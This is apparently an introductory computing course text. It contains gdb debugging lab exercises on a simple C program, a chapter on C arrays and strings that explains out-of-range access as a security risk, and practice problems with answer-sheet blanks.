Verify that you have sx3.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
You should see the sx3.c file (along with perhaps some additional files from last lab):
If you do not have sx3.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to
Part 2.
(Picture caption: I'm a famous USNA grad. Don't you see the light? Who am I?)
Part 2: Running the C Program
You should now be in the work directory:
Examine the program sx3.c using nano (i.e., type in: nano sx3.c ). The C program is shown below:
#include<stdio.h>
int main( )
{
    int x;
    x = 5;
    if( x == 4)
        printf( "Army\n");
    else
        printf("Navy\n");
}
Note that this is a silly program, because it is designed to always print out Navy. In other words, this program has no need for
an if-else statement. We have intentionally written the program this way to give you practice traipsing through memory.
Save the program by entering Control-o (where that is the letter o, not the number 0) saving the file under its current name,
and exit nano by entering Control-x.
Compile your program using gcc:
gcc -g sx3.c
and then run your program
./a.out
to confirm it executes as expected. If your program is not working STOP and ask your instructor or lab tech for help.
Otherwise, proceed to Part 3.
Part 3: Program Autopsy: Case 2
Set up the debugger using the code shown below:
gdb -q ./a.out
After you press enter, you should see a line of gobbledygook (Using host libthread…) and then you should see the prompt
change to (gdb) indicating that you are using the debugger. Then continue by entering the following commands (hitting
ENTER after each command).
set dis intel
list
disassemble main
break main
run
Here is a screen capture of the assembly code you should see:
(Annotation on the screen capture: "Program has stopped here, at this breakpoint.")
Notice that the program has stopped at the breakpoint shown above. The line:
Breakpoint 1 at 0x8048384: file sx3.c, line 5.
means, in English: The next instruction that will be executed (but has not yet been executed) is stored in address 0x8048384.
If we look for this address in the top part of the assembly code, we quickly find it:
Question 1:
From the picture above, what should be the current value of the instruction pointer (i.e., what address
is stored in the instruction pointer)? Verify your answer by inspecting the value of the instruction
pointer by entering: i r eip
Question 2:
What is the next assembly language instruction that will be executed (but has not yet been executed)?
Look at the line of code:
mov DWORD PTR [ebp-4],0x5
What is this assembly language code trying to accomplish? In English, this assembly language instruction is saying:
Place the value 5 in main memory at the location that has the address: ebp-4.
Recall that ebp is one of the CPU's registers. Specifically, ebp points to one end of the region in main memory that the
program has available to store the variables and values that it needs. Again: ebp holds an address.
Whatever value is in ebp, the value of "ebp-4" will be the address four bytes earlier than ebp.
So, the instruction
mov DWORD PTR [ebp-4],0x5
would place the value 5 in the memory location specified by ebp - 4.
Question 3:
In my illustrative example above, where I entered the value 5 into address baaaa810, why did I
block out (in blue) four bytes of memory?
Recall that our C program is:
#include<stdio.h>
int main( )
{
    int x;
    x = 5;
    if( x == 4)
        printf( "Army\n");
    else
        printf("Navy\n");
}
And the next assembly language instruction that will be executed (but has not yet been executed) is:
mov DWORD PTR [ebp-4],0x5
Question 4:
What line(s) of C code does this assembly language correspond to?
Now, execute one line of machine code—the line above—by entering nexti.
So… you have just executed the instruction mov DWORD PTR [ebp-4],0x5.
Question 5:
Examine the assembly language code shown two pages back. What values do you expect to be
stored in the instruction pointer? Verify your answer by examining the value of eip. (You know
how to do this! i r eip .)
If your answer to Question 5 did not end in the hexadecimal number b then STOP and ask your instructor or lab tech for help.
Otherwise, proceed to Part 4.
Part 4: Program Autopsy Continued
Recall that the assembly language instruction you recently executed, mov DWORD PTR [ebp-4],0x5, places the value
5 in the memory location specified by ebp-4. Let's see if this is accurate!
Question 6:
What is the value stored in ebp?
Question 7:
What is the value of ebp-4?
Question 8:
Examine memory to determine what is stored in the address specified by ebp-4 . Use the examine
command: x/x followed by the address you want to examine. For example, if you want to look at
the contents of memory location 0xbffff800 you would enter x/x 0xbffff800.
Question 9:
In the picture below, which shows a section of the stack, fill in the value of ebp, write the addresses
next to all memory locations, and fill in the values stored in locations. Specifically, fill in the hex
value corresponding to the byte stored at each memory location shown in the diagram. (This picture
is also replicated on your answer sheet.)
Now look at the next line of code that will be (but has not yet been) executed:
cmp DWORD PTR [ebp-4],0x4
In x86 assembly language, cmp means compare. Specifically, this line of code is comparing the value stored at the address
ebp-4 to the value 4.
Question 10:
Are the two values (the value stored at location ebp-4 and the integer 4) equal to each other
or not equal to each other?
Question 11:
Look again at your C program. What portion of C code do you think the assembly language instruction
cmp DWORD PTR [ebp-4],0x4
corresponds to?
Now, execute one line of code by entering nexti .
You have just executed the instruction: cmp DWORD PTR [ebp-4],0x4 .
Question 12:
By looking at the value stored in the instruction pointer, and by looking at the assembly language
code shown a few pages back, what is the next line of assembly code that will be executed (but has
not yet been executed)?
If your answer to Question 12 did not end in the hexadecimal number f then STOP and ask your instructor or lab tech for
help. Otherwise, proceed to Part 5.
Part 5: Program Autopsy Continued Continued
Look at the instruction:
jne 0x804839f
In x86, jne stands for jump if not equal. Recall that the preceding instruction did a comparison, and, based on the results of
the comparison, we will have one of two answers:
Yes, the two items that were compared are equal
or
No, the two items that were compared are not equal.
So the line of code
jne 0x804839f
means, in English:
If the two items we just compared are not equal, jump to instruction at address 0x804839f. Otherwise (if the items
were equal), just continue with the next instruction in sequence.
Question 13:
Do you expect that after we execute the assembly language instruction
jne 0x804839f
the CPU will jump to 0x804839f as the next instruction? Explain.
Now, execute one line of code by entering nexti . This will execute the line: jne 0x804839f .
Question 14:
What is the new value of the instruction pointer? Explain.
Question 15:
What is the next line of assembly language code that will be executed? (Look at the address in the
eip register and find the corresponding assembly language instruction.)
Let’s examine the assembly language instruction:
mov DWORD PTR [esp],0x804848a
This essentially says: The variable esp holds an address. Place the value 0x804848a in the location specified by this
address. So, for example, if esp holds the address 56, then this will place the value 0x804848a in memory location 56.
Execute this instruction by entering nexti.
Question 16:
The picture below shows a portion of the program's stack in main memory. Notice that the value 5
is stored at addresses bffff814 – bffff817. Complete the picture by filling in the value of
the stack pointer (esp) as well as the contents of memory locations bffff810 – bffff813.
Note that this figure is replicated on your answer sheet.
STOP. Show your instructor or lab tech your answer to Question 16. Then proceed to Part 6.
Part 6: Be a Hacker!
Our program is very interested in the address 0x804848a. It took the time to store this value on the stack, and the stack is
used to store information the program needs to successfully execute.
Question 17:
Investigate what is so special about address 0x804848a . Look inside this address using the x/x
command. Be a sleuth! Why does this address matter? (Hint: there are characters stored there!)
The remaining part of the program simply prints the string of characters at address 0x804848a to the monitor.
To exit out of the debugger, enter: quit . When you are asked:
The program is running.
Exit anyway? (y or n)
select y.
Part 7: EXTRA CREDIT Program Autopsy: Case 3
Using nano, change your C program by replacing the line
x = 5;
with the line
x = 4;
Then run the program line-by-line in the debugger (gdb) as before.
Question 18:
Your first breakpoint was at main. As you execute the program by repeatedly entering nexti,
what is the first line of assembly language that is executed in this program that was not executed in
the prior program?
Question 19:
What is the significance of the number 0x8048484 which appears in the assembly code?
Security Exercise 3 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
EXTRA CREDIT
Question 18:
Question 19:
Chapter 4: Arrays and Strings
Objectives:
(a) Describe how an array is stored in memory.
(b) Define a string, and describe how strings are stored.
(c) Describe the implications of reading or writing beyond the boundary of an array.
(d) Describe how to change the values of individual array elements.
1. Arrays
1.1. Why Use Arrays? Consider the following problem: Suppose an instructor has just finished grading the six-week exams
for the twenty midshipmen in her section of EC310. Write a C program that will compute the average and also determine how
far each student’s individual grade is from the average.
One way to start this program would be to declare twenty variables to hold the twenty grades:
float student1_grade, student2_grade, student3_grade … etc., etc.
This is cumbersome. All these variables! Ugh. Suppose there were 100 students in the section. We would need 100 variables
to hold the 100 grades.
Suppose we consider a different (better!) approach. Instead of having 20 separate variables to hold our 20 six-week exam
scores, we will use a "large box with multiple slots." We might name the entire large box six_week_grade. The top slot
will hold the first student’s six-week exam grade, the second slot will hold the second student’s six-week exam grade, and so
forth. Instead of using the term "large box with multiple slots", let’s call this an array. In C, an array is frequently also termed
a buffer.
(Figure: the "large box with multiple slots", drawn as a column of slots labelled "First student's grade goes here", "Second student's grade goes here", "Third student's grade goes here".)
So that we can more easily draw our arrays, we will imagine that our section has five students. The concepts will, of course,
apply to arrays of any size. Let's say, for the purposes of this discussion, that our five students: Mid 1, Mid 2, Mid 3, Mid 4
and Mid 5, have grades of 98, 87.5, 94, 90 and 92, respectively.
1.2. Arrays An array is a collection of data, all of the same type. Recall that when we say type we are referring to int, float
or char. More precisely, an array is a consecutive group of memory locations, all with the same name, all holding the same
type of data. Our array of five student grades (all of type float) might be arranged in main memory as:
(Figure: the five float grades in consecutive main-memory locations, labelled first through fifth student's grade, with ellipses above and below the array.)
Notice first that our five array elements are stored in consecutive memory locations. Second, note that the addresses are
separated by four bytes, since each value of type float is stored in four bytes. The precise location in main memory where
the array will be stored is determined by the compiler.
You might be surprised to know that the third and most important point to note in the figure above is the ellipses (i.e., the
three dots) shown at the top and bottom of the array! There are items in main memory "above" our array, and items in main
memory "below" our array.
Suppose we want to give our array the name: six_week_grade . Recalling that our array will hold five grades, each of
type float, we can declare our array as:
float six_week_grade[ 5 ] ;
More generally, the syntax for declaring an array is
type array_name [ number of items in the array ] ;
Here, type says that all items stored in the array must be of the same type; array_name follows the same rules as variable
names; and the number of items in the array, also called the "size" of the array, must be an integer or an expression that
evaluates to an integer.
The following would all be valid examples of array declarations:
float temperatures[31];
int calories[90];
float migraine_intensity_level[1000];
Returning to our example, when we first declare our array as
float six_week_grade[ 5 ] ;
the compiler will reserve adjacent memory for five variables of type float. The entire array will be named
six_week_grade. The picture would look like this (where the exact addresses are chosen by the compiler):
The values stored in these memory locations are, presently, "garbage values".
Note that when we declare an array, the size of the array can be a variable, so long as the variable has a value that is known.
The following code is perfectly fine, and would produce the same array as that shown above:
int number_in_class = 5 ;
float six_week_grade[number_in_class ] ;
This will work since by the time we reach the declaration for the array
float six_week_grade[number_in_class ] ;
the value of the size of the array (the variable named number_in_class) is already explicitly known from a prior
declaration that has already been encountered:
int number_in_class = 5 ;
Practice Problem 4.1
Write a declaration that could be used to hold the individual letter grades for 250 midshipmen.
Solution:
Obviously, we do not want garbage values in our array. How do we get our student grades into this array?
1.3. Array Elements The individual elements in the array are variables. Each individual memory location in the array is
indexed by a position number in the array.
In our array named six_week_grade, the individual variables in the array (i.e., the variables that will hold the 5 individual
six-week scores) are indexed from 0 to 4. The index is placed in square brackets after the array name. So, the name of the first
variable in the array is six_week_grade[0], the name of the second variable in the array six_week_grade[1] ,
and so forth.
The individual array elements are variables and can be used in expressions just as you would ordinarily use any variable. So,
for example, the line of code
six_week_grade[ 2 ] = 94 ;
would change our picture to this:
So, the third midshipman grade, which we refer to as six_week_grade[ 2 ], is now stored in the array. (The other four
array values are still garbage values.)
Important point guaranteed to cause confusion: Note that the first variable in the array has an index of zero, not one. This is
counter-intuitive. In the above example, you would think that the first six-week exam grade should be indexed as
six_week_grade[1] since, after all, it is the first score. You would be wrong! The first score in our array of scores is
indexed as six_week_grade[0]. Most programming languages (e.g., C, C++, Java, JavaScript) start with the index at
zero just to make it easier for the CPU to index into the array.
We could fill in our array in memory by adding the lines of code:
six_week_grade[ 0 ] = 98 ;
six_week_grade[ 1 ] = 87.5 ;
six_week_grade[ 3 ] = 90 ;
six_week_grade[ 4 ] = 92 ;
after which our array is stored as shown:
It bears repeating: The individual array elements are variables and can be used in expressions just as you would ordinarily use
any variable. If we wanted to add two points to the first midshipman's grade we could use
six_week_grade[ 0 ] = six_week_grade[ 0 ] + 2 ;
If we wanted to read the value of the third midshipman's grade in from the keyboard, we could use
scanf("%f", &six_week_grade[2] );
If we wanted to print the second midshipman grade to the monitor, we could use
printf("%f" , six_week_grade[1] );
We can use array elements in Boolean expressions, such as if ( score[3] > 90 )....
Note that when referring to an array element, the index does not need to be an integer constant. We can use any expression in
the brackets that evaluates to an integer. As an example, the for loop below might be used to read in from the keyboard the
grades for 5 students.
for ( number = 0 ; number < 5 ; number = number + 1 )
{
    printf( "Enter score for student %d : " , number + 1 );
    scanf( "%f" , &six_week_grade[ number ] );
}
Practice Problem 4.2
Suppose we have 5 students in EC310. A portion of a C program that declares an array of floats named six_week_grade
that will hold the midterm grades for the class is shown below. Your program should allow the user to enter the midterm grades
at runtime, and should then print out the midterm grades. Your program output should appear as shown below:
Fill in the one missing line of code.
#include <stdio.h>
int main()
{
    float six_week_grade[5];
    int number ;
    for ( number = 0 ; number < 5 ; number = number + 1 )
    {
        printf( "Enter score for student %d : " , number + 1 );
        scanf( "%f" , &six_week_grade[ number ] );
    }
    for ( number = 0 ; number < 5 ; number = number + 1 )
    {

    }
}
Practice Problem 4.3
Consider an array declared as
float pay[4];
(a) How much memory is reserved for this array?
Solution:
(b) What are the four variables that are collected into this array? Solution:
(c) What is the name of the array of four variables? Solution:
(d) The first array element is stored at address 0x0000008e, what is the address of the second element?
Solution:
1.4. Initialization of Arrays It is possible to initialize the values of an array in the array's declaration. To initialize arrays in
the declaration, we place the initial values in braces, and separate the values with commas. Our array of student grades could
have been initialized by the declaration:
float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 };
There are some caveats to this: First, if we initialize only the first part of an array, the remaining elements are initialized to
zero. For example, the declaration
float six_week_grade[ 5 ] = { 98 , 87.5 };
has the exact same effect as
float six_week_grade[ 5 ] = { 98 , 87.5 , 0 , 0 , 0 };
The second caveat: If you initialize an array when it is declared, you can omit the array size. The size will be set permanently
to be the minimum size needed to store the initialization values. So, for example, the array declaration
float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 };
is the same as the declaration
float six_week_grade[ ] = { 98 , 87.5 , 94 , 90 , 92 };
When dealing with arrays, you must note that we use the square brackets [ and ] in two different ways:
• In the array declaration, the number in the square brackets gives the size of the array (i.e., the number of items in the
array). This value must be known when the array is declared.
• Anywhere outside the declaration, the number in the square brackets tells which element in the array (the specific
variable) we are referring to.
After six pages of array syntax, you might be thinking: "Wonderful, so what?" As we will see, arrays have a horrendous security
vulnerability baked into them.
1.5. The Dreaded Out-of-Range Error C will not prevent you from trying to access an array element that is out of the
array's range. Stated another way, C will not prevent you from trying to read from or write to "nonexistent" array elements. What
exactly does this mean? Consider the array declaration
int salary[3];
which declares an array with three variables: salary[0], salary[1] and salary[2]. But what happens if we
have a statement such as
printf( "%d" , salary[3] );
when there is no variable salary[3]? Let's see! Consider the program below.
#include <stdio.h>
int main()
{
    int salary[3] = { 1000 , 1500 , 2000 };
    int j;
    for ( j = 0 ; j <= 3 ; j = j + 1 )
    {
        printf("Salary %d is %d \n" , j+1 , salary[j] );
    }
}
The output from this program is:
No compilation error results in the program above...but do you see the potential dangers? Where does the last number come
from? The answer: It is the value that is located in memory immediately after salary[ 2 ]! This is a garbage value.
When we index an array variable using an index outside the range of indices specified in the array's declaration, we commit an
"out-of-range error." Again, it is critical to note that C will not prevent you from looking into memory beyond the end of
your array.
What would be the danger in the following program snippet?
float salary[3];
int j;
(other code not shown)
for ( j = 0 ; j <= 3 ; j = j + 1 )
{
printf("Enter salary %d: ", j + 1 );
scanf( "%f" , &salary[j] );
}
(more code)
The program above does not produce any compilation errors, but running this program is potentially very dangerous. Do you
see why? Notice that the for loop, in its final iteration, attempts to enter a value into a variable named salary[3].
There is no variable named salary[ 3 ]! The program will simply write over whatever was stored in the memory
location following salary[ 2 ].
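The following is an added example, not code from the notes, that checks the claims of Sections 1.2 through 1.5 in running C: the four-byte distance between adjacent float elements, the size the compiler infers from an initializer list, the zero-fill of a partial initializer, and the two "j <= 3" loops over salary[3] from this section re-run through a bounds check that C itself never performs. The ARRAY_LEN macro and the checked_read/checked_write helpers are this example's own, not part of C or of the course code, and the write loop uses int in place of the page's float so both loops share one helper.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdbool.h>

/* Number of elements in an array whose declaration is in scope: this is how a
   size omitted from an initialized declaration can still be recovered. */
#define ARRAY_LEN(a) (sizeof(a) / sizeof((a)[0]))

/* Section 1.2: elements occupy consecutive memory, one sizeof(float) apart.
   Returns the distance in bytes between six_week_grade[0] and six_week_grade[1]. */
ptrdiff_t element_stride_bytes(void)
{
    float six_week_grade[5];
    return (char *)&six_week_grade[1] - (char *)&six_week_grade[0];   /* 4 bytes */
}

/* Section 1.4: with the size omitted, the compiler sizes the array to its
   initializer list. */
size_t inferred_size(void)
{
    float six_week_grade[] = { 98 , 87.5 , 94 , 90 , 92 };
    return ARRAY_LEN(six_week_grade);   /* 5 */
}

/* Section 1.4: a partial initializer zero-fills the elements it does not name.
   Returns how many of the five elements are exactly 0. */
int zeros_after_partial_init(void)
{
    float six_week_grade[5] = { 98 , 87.5 };
    int zeros = 0;
    for (size_t i = 0; i < ARRAY_LEN(six_week_grade); i = i + 1)
        if (six_week_grade[i] == 0)
            zeros = zeros + 1;
    return zeros;   /* 3 */
}

/* Section 1.5: C performs no range check, so the program must. Both helpers
   (this example's own, not part of C) refuse any index outside 0..len-1; a
   negative j converted to size_t becomes a huge value and is refused as well. */
bool checked_read(const int *arr, size_t len, size_t idx, int *out)
{
    if (idx >= len)
        return false;
    *out = arr[idx];
    return true;
}

bool checked_write(int *arr, size_t len, size_t idx, int value)
{
    if (idx >= len)
        return false;
    arr[idx] = value;
    return true;
}

/* The page's loop "for ( j = 0 ; j <= 3 ; ... )" over int salary[3], run through
   checked_read. Returns the number of reads refused; the original program
   printed a garbage value for each of those instead. */
int rejected_salary_reads(void)
{
    int salary[3] = { 1000 , 1500 , 2000 };
    int rejected = 0, value;
    for (int j = 0; j <= 3; j = j + 1) {
        if (checked_read(salary, ARRAY_LEN(salary), (size_t)j, &value))
            printf("Salary %d is %d\n", j + 1, value);
        else {
            printf("Salary %d: index %d is out of range (valid indices 0..%zu)\n",
                   j + 1, j, ARRAY_LEN(salary) - 1);
            rejected = rejected + 1;
        }
    }
    return rejected;   /* 1: only salary[3] is refused */
}

/* The write loop from the "What would be the danger" snippet, bounds-checked.
   Instead of overwriting the memory after salary[2], the fourth write is refused. */
int rejected_salary_writes(void)
{
    int salary[3] = { 0 , 0 , 0 };
    int rejected = 0;
    for (int j = 0; j <= 3; j = j + 1)
        if (!checked_write(salary, ARRAY_LEN(salary), (size_t)j, (j + 1) * 1000))
            rejected = rejected + 1;
    return rejected;   /* 1 */
}

int main(void)
{
    printf("bytes between adjacent float elements: %ld\n", (long)element_stride_bytes());
    printf("size inferred from initializer: %zu\n", inferred_size());
    printf("zero-filled elements after partial init: %d\n", zeros_after_partial_init());
    printf("out-of-range reads refused: %d\n", rejected_salary_reads());
    printf("out-of-range writes refused: %d\n", rejected_salary_writes());
    return 0;
}
```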
We now switch gears (slightly) and talk about arrays of characters—that is, arrays where each element in the array is of type
char.
2. Strings
2.1. Introduction Suppose the contents of 5 consecutive bytes in computer memory are as follows:
0100 1110
0110 0001
0111 0110
0111 1001
0000 0000
As ASCII characters, this is the same as:
'N'   'a'   'v'   'y'   0
Note that 0 is the NULL character. In C, a string of characters is a NULL-terminated sequence of characters.
2.2. String literals A literal is similar in notion to a constant. For example, the integer 5 is a literal. The float value 3.1416
is a literal. We can have string literals as well. A string literal is written as a list of characters enclosed within double quotes.
For example, "Navy" is a string literal.
Although the length of the string is 4 (the 4 characters 'N', 'a', 'v' and 'y'), it takes 5 bytes to store this string in memory.
This is because the NULL character has to be included for C to treat the collection of characters as a string.
2.3. String variables In C, strings—i.e., sequences of characters—are stored as arrays of characters. Here is an example of
declaring a string variable using a character array:
char school[5] = "Navy";
The array named school holds 5 characters: 'N', 'a', 'v', 'y', 0.
It is worth noting again that the length of the string "Navy" is 4, but it actually has 5 characters, since the NULL character
which appears at the end is actually part of the string. So if you want a string to hold "Navy", it must have space allotted for
at least 5 characters.
You may be wondering: Why the zero at the end of the string? What's up with that?
The zero at the end tells C when to stop accessing the array! For example, we have seen many times already that strings are
printed to the screen with the %s conversion specifier, as in:
printf( "Go %s! Beat %s!\n", school, "Army" );
How does the printf know when to stop printing out the string named school? As it turns out, printf will print out the
first element in the array named school, and then printf will continue to print out characters, one-by-one, until it reaches
the zero (i.e., the NULL).
2.4. Changing the value of a string variable We can initialize a string variable when it is declared (as in char school[5]
= "Navy"; ). But, if we assign a string a value when it is declared, can we change the value later?
With other types, such as int, float and char, you were allowed to assign values to the variables in a manner like this:
int favorite_number ;
favorite_number = 7 ;
Unfortunately, assignments cannot be done like this with strings. The code below will not compile:
char school[5];
school = "Navy";
So… how can we change the value of a string? There are two ways.
Changing a string value character by character. We can change the value of a string by changing the values of the individual
characters. For example:
char school[5] = "Navy";
printf( "%s\n", school );
school[0] = 'U';
school[1] = 'S';
school[2] = 'N';
school[3] = 'A';
printf( "%s\n" , school );
Practice Problem 4.4
Continuing the example above, what would happen if we modified two lines of code as shown below:
school[2] = 'A';
school[3] = 0 ;
printf( "%s\n", school );
Solution:
Changing a string value using strcpy The second way to change a string’s value is with the “string copy” function. The
syntax is
strcpy( s1 , s2 );
This function copies the string s2 to the string s1. When the string s2 is copied over the string s1, the strcpy function
automatically places a closing NULL at the end of the new (modified) string s1.
To use the function strcpy, you must have the following line at the top of your program:
#include<string.h>
One final note about strings. When entering strings from the keyboard don’t use the ampersand: &. For example, to enter a
midshipman's last name from the keyboard, we would use:
char mid_name[24] ;
scanf( "%s" , mid_name );
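An added example, not code from the notes, that ties Sections 2.1 through 2.4 together: a length function that walks to the NULL exactly as printf's %s does, the byte count "Navy" actually needs, a bounded replacement for strcpy that refuses a copy too large for its destination (strcpy itself performs no such check), and the keyboard read into char mid_name[24] redone with sscanf on a constructed input string and a %23s field width, so at most 23 characters plus the NULL are ever stored. The helper names and the sample inputs are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stddef.h>

/* Walks the array one byte at a time until the NULL terminator, exactly as
   printf's %s does; the terminator itself is not counted. */
size_t c_string_length(const char *s)
{
    size_t n = 0;
    while (s[n] != 0)
        n = n + 1;
    return n;
}

/* Bytes a char array needs to hold s as a string: the characters plus the
   terminating NULL. "Navy" needs 5, not 4. */
size_t bytes_needed(const char *s)
{
    return c_string_length(s) + 1;
}

/* Replacement for strcpy that refuses a copy which would run past the end of
   dst. Returns false and leaves dst as an empty string when src does not fit. */
bool bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return false;
    if (bytes_needed(src) > dst_size) {
        dst[0] = 0;
        return false;
    }
    memcpy(dst, src, bytes_needed(src));   /* the NULL is copied too */
    return true;
}

/* Uses bounded_copy on a 5-byte array, the size of char school[5] on the page.
   Returns the stored string's length, or -1 when the copy was refused. */
int copy_into_school(const char *src)
{
    char school[5];
    if (!bounded_copy(school, sizeof school, src))
        return -1;
    return (int)c_string_length(school);
}

/* Shows why the NULL matters: copy src into a scratch array, write a 0 at
   position idx, and report how long C now considers the string to be. */
int length_after_null_at(const char *src, size_t idx)
{
    char scratch[32];
    if (!bounded_copy(scratch, sizeof scratch, src) || idx >= sizeof scratch)
        return -1;
    scratch[idx] = 0;
    return (int)c_string_length(scratch);
}

/* Reads a name into char mid_name[24] as the page does, but from a constructed
   input string (sscanf instead of scanf) and with the %23s field width, so no
   more than 23 characters plus the NULL are stored. Returns the stored length,
   or -1 if nothing was read. */
int read_name_bounded(const char *keyboard_input)
{
    char mid_name[24];
    if (sscanf(keyboard_input, "%23s", mid_name) != 1)
        return -1;
    return (int)c_string_length(mid_name);
}

int main(void)
{
    const char *name = "Hopper";                               /* constructed input */
    const char *long_name = "Abcdefghijklmnopqrstuvwxyz1234";  /* 30 chars, constructed */
    printf("length of \"Navy\": %zu, bytes needed: %zu\n",
           c_string_length("Navy"), bytes_needed("Navy"));
    printf("copy \"Navy\" into school[5]: %d\n", copy_into_school("Navy"));
    printf("copy \"Academy\" into school[5]: %d\n", copy_into_school("Academy"));
    printf("\"Navy\" with a NULL written at index 2: length %d\n",
           length_after_null_at("Navy", 2));
    printf("%s -> %d chars stored; 30-char name -> %d chars stored\n",
           name, read_name_bounded(name), read_name_bounded(long_name));
    return 0;
}
```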
As an introduction to the dangers inherent in using arrays, you might find it useful to view two videos:
"It came from California… the students were safe… their computers weren't…" :
https://www.youtube.com/watch?v=fj8S6Hd-5bk
What's that you say? You don't see the danger! Let's watch another video from March 2009 (the first 4 minutes is enough).
http://www.cbsnews.com/videos/the-internet-is-infected/
Practice Problem 4.5
We want to write a C program that declares a string (a character array) and initializes it to "Military Academy", prints this
string to the screen, then, within the program, changes the string to the name of your favorite college, and then, once again,
prints the string to the monitor.
Your program output should appear as shown below:
Fill in the three missing lines of code.
Solution:
#include <stdio.h>
#include<string.h>
int main()
{
char phrase[] = "Military Academy" ;
}
Practice Problem 4.6
Answer the questions about the character string in memory shown below, where the first element in the string is 0x53.
(a)
What is the minimum number of bytes that could have safely been allocated for this string ?
(b)
Write this declaration, naming the array 'myString' .
(c)
What is the address of 'myString[0]' ?
(d)
What character is at myString[1]?
Solution:
(a)
(b)
(c)
(d)
Practice Problem 4.7
(a) Write the declaration for an array named LuckyNumbers which will hold 6 integers.
Solution:
(b) Complete this statement to display the 4th LuckyNumber:
printf("The fourth lucky number is %d\n",          );
Solution:
printf("The fourth lucky number is %d\n",          );
(c) What happens if I attempt to display LuckyNumbers[9]?
i. Will it return a value?
ii. Will I receive an error message?
iii. Will the program crash?
Solution:
i:
ii:
iii:
Problems
1. To create a variable that contains a letter of the alphabet:
a) What data type will I need to use?
b) What special data structure will group a collection of these letters into a word or sentence?
2. Consider the section of main memory shown below. The address of one of the individual bytes is also shown on the figure.
The decimal (base-10) integer value of 150 is stored at address 00003D18.
a) On the picture above, show how the value of 150 would be stored in main memory. Use hexadecimal notation.
b) Annotate the diagram above to show the addresses for each byte in memory that is depicted on the figure (so that all
nine bytes have the proper address shown).
c) What would be displayed on the monitor by the command: x/xb 0x00003D18 ?
d) What would be displayed on the monitor by the command: x/xh 0x00003D18 ?
e) What would be displayed on the monitor by the command: x/xw 0x00003D18 ?
3. Move the program char_array2.c from the booksrc directory to your work directory. Run the code with the
debugger by entering the seven lines of code shown on page 85 of Chapter 3, EXCEPT instead of the line "break main"
use "break 6". This will insert a breakpoint at line 6 (which should correspond to the blank line in the code listing).
Thus, you will run the program up to the breakpoint at line 6.
a) In words (a sentence or two), what does this program do?
b) At the breakpoint (where your program stops), what is the value of the instruction pointer?
c) At the breakpoint, what would be the result of entering x/i $eip ?
4. Consider the picture below, where all memory contents are in hexadecimal:
a) In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not be:
"804838d".)
b) What would be displayed on the monitor by the command: i r eip ?
c) What would be displayed on the monitor by the command: x/xb $eip ?
d) What would be displayed on the monitor by the command: i r esp ?
e) What would be displayed on the monitor by the command: x/xw $esp ?
f) What would be displayed on the monitor by the command: x/xb 0x08048475 ?
g) What would be displayed on the monitor by the command: x/xs 0x08048475 ?
5. What is the fundamental issue with C that makes a buffer overflow exploit possible?
6. Use the array declaration to answer the questions.
float wins[6] = {3.4,7,4,6.1,9,10};
a) How many bytes are allocated for this array?
b) What value is stored in wins[1]?
c) What value is stored in wins[6]?
7. Let’s pretend there are 5 students in EC310. We want to write a C program that declares an array named EC310midterm
that will hold the midterm grades for the class. The program should allow the user to enter the midterm grades at runtime,
and should then print out the average of the midterm grades. Here is an example of how the program should appear:
Since your EC310 instructors "exist to serve", they have provided you with the source code. Since your EC310 instructors
also have a mean streak, they have left several strategic lines of code missing.
#include <stdio.h>
int main()
{
    int num_students = 5;
    float EC310midterm[          ];
    int number;
    float sum = 0;
    float average;
    for (            ;            ;            )
    {
        printf( "Enter score for student %d : " , number + 1);
        scanf( "%f" , &EC310midterm[ number ] );
        sum = sum +            ;
    }
    average =            ;
    printf( "Class midterm average: %f \n" , average );
}
Enter this program, filling in the correct (missing) lines of code. Run the program to ensure it works correctly. It is
recommended that you type this code, rather than cut-and-paste. Turn in a copy of your source code and a screen capture
of your program successfully running. (Note: To perform a screen capture, hold down the Control, Alt and PrintScreen keys, all at the same time. This will save a picture of the screen to the clipboard, which you can paste into an
MSWORD doc.)
8. In the program presented in Problem 7 above, if the line of code:
EC310midterm[5] = 100 ;
was added to the end of the existing code, would the program still compile? If so, describe what we might expect the effect
to be.
Security Exercise 4
Part 1: Initial Set-Up
Your instructors have prewritten three of the C programs that you will use for this lab, and have placed them in the ec310code
directory. We have done this because we care.[10] The programs you will use today are named sx4a.c , sx4b.c and
sx4c.c and these three programs are sitting in the ec310code directory:
We need to copy these files to the work directory. To copy them from the ec310code directory to the work directory,
carefully enter the following at the home directory prompt:
midshipman@EC310:~ $ cp ec310code/sx4a.c work
(Make sure you are at your home directory! Enter this exactly as shown.)
Now carefully enter the following two lines at the home directory prompt:
midshipman@EC310:~ $ cp ec310code/sx4b.c work
midshipman@EC310:~ $ cp ec310code/sx4c.c work
If all went well, you should have copies of sx4a.c , sx4b.c and sx4c.c in your work directory.
Verify that you have sx4a.c , sx4b.c and sx4c.c in your work directory by changing to the work directory: cd work
and then listing the files in the work directory: ls.
If you do not have sx4a.c , sx4b.c and sx4c.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2.
[10] ECE: The Caring Department.
Part 2: Fun with Navy
You should now be in the work directory:
Examine the program sx4a.c using nano. The C program is shown below:
#include<stdio.h>
#include<string.h>
int main( )
{
char school[ 5 ] ;
school[ 0 ] = 'N' ;
school[ 1 ] = 'a' ;
school[ 2 ] = 'v' ;
school[ 3 ] = 'y' ;
school[ 4 ] = 0 ;
printf( "%s\n" , school );
}
Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using
gcc -g sx4a.c
and then run your program
./a.out
to confirm it executes as expected.
If your program is not working STOP and ask your instructor for help. Otherwise, proceed to Part 3.
Part 3: Wa?
Now, using nano change the line
char school[ 5 ] ;
to read
char school[ 10 ] ;
and rerun your program.
Question 1: What effect did this modification have on your program's output? Explain.
Now, we would like to modify our program so that it prints out: Wavy instead of Navy. Change one line of code in your
program to accomplish this. Do not use strcpy for this question. Verify your solution works.
Question 2: What change did you make to your program?
